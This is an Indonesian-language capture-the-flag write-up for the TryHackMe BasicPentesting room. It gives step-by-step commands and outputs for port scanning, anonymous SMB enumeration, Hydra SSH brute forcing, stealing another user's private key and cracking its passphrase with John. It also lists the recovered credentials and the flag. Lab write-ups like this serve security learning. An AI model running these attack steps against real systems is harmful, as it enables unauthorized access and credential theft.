Lab ini mendemonstrasikan teknik-teknik dasar penetration testing, mulai dari network reconnaissance, SMB enumeration, SSH brute-forcing, hingga cracking SSH private key terenkripsi. Melalui enumerasi sistematis, berhasil diperoleh akses ke beberapa akun pengguna dan passphrase dari encrypted SSH private key berhasil di-crack.
| Item | Detail |
|---|---|
| Target IP | 10.82.181.159 |
| Platform | TryHackMe |
| Room | BasicPentesting |
| Difficulty | Easy |
Reconnaissance (Nmap)
β
βΌ
SMB Enumeration βββΊ Temukan file staff.txt βββΊ Username: jan, kay
β
βΌ
SSH Brute Force (Hydra) βββΊ jan : armando
β
βΌ
Internal Enumeration βββΊ Temukan /home/kay/.ssh/id_rsa
β
βΌ
Crack Private Key (John) βββΊ passphrase: beeswax
β
βΌ
Login sebagai kay βββΊ cat pass.bak βββΊ FLAG!
nmap -sS -sV -Pn -T4 10.82.181.159π Output
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-21 16:00 WIB
Nmap scan report for 10.82.181.159
Host is up (0.46s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
| Port | Service | Status |
|---|---|---|
| 22 | SSH | β Running |
| 80 | HTTP | β Web Server |
| 445 | SMB |
smbclient -L //10.82.181.159 -NSharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.15.13-Ubuntu)
π‘ Finding: Share
Anonymousdapat diakses tanpa password!
smbclient //10.82.181.159/Anonymous -Nsmb: \> ls
. D 0 Fri Apr 20 00:31:20 2018
.. D 0 Fri Apr 20 00:13:06 2018
staff.txt N 173 Fri Apr 20 00:29:55 2018
smb: \> get staff.txt
cat staff.txtAnnouncement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
π― Valid Usernames Ditemukan:
jankay
Menggunakan Hydra untuk brute force SSH dengan wordlist rockyou.txt.
hydra -l jan -P rockyou.txt 10.82.181.159 ssh -t 4π Output
[22][ssh] host: 10.82.181.159 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
β Credentials Ditemukan:
jan : armando
ssh jan@10.82.181.159
# Password: armandoSetelah login sebagai jan, lakukan enumerasi internal:
whoami && id
ls /home
ls -la /home/kay/.sshπ Temuan: File
id_rsa(SSH Private Key terenkripsi) milik userkayditemukan di/home/kay/.ssh/
scp jan@10.82.181.159:/home/kay/.ssh/id_rsa .
chmod 600 id_rsapython3 ssh2john.py id_rsa > hash.txtjohn --wordlist=/home/malakul-tech/rockyou.txt /home/malakul-tech/hash.txtLoaded 1 password hash (SSH, SSH private key [MD5/AES])
beeswax (id_rsa)
1g 0:00:00:00 DONE β Session completed
β Passphrase Ditemukan:
beeswax
ssh -i id_rsa kay@10.82.181.159
# Enter passphrase: beeswaxkay@ip-10-82-181-159:~$ ls
pass.bak
kay@ip-10-82-181-159:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$π FLAG/Password Ditemukan:
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
| Tool | Kegunaan |
|---|---|
nmap |
Network reconnaissance & port scanning |
smbclient |
SMB enumeration & file retrieval |
hydra |
SSH brute force |
ssh2john |
Konversi SSH key ke format hash |
john |
Password / passphrase cracking |
scp |
Copy file dari target ke attacker |
- SMB Anonymous Login β Share publik tanpa autentikasi bisa bocorkan informasi sensitif seperti username.
- Weak SSH Passwords β Password lemah mudah di-crack dengan wordlist umum seperti
rockyou.txt. - SSH Key Permissions β Private key milik user lain yang dapat dibaca oleh user biasa adalah misconfiguration serius.
- Encrypted Key β Aman β Passphrase yang lemah pada private key sama berbahayanya dengan password lemah.
Solved by Vexeeldev follow me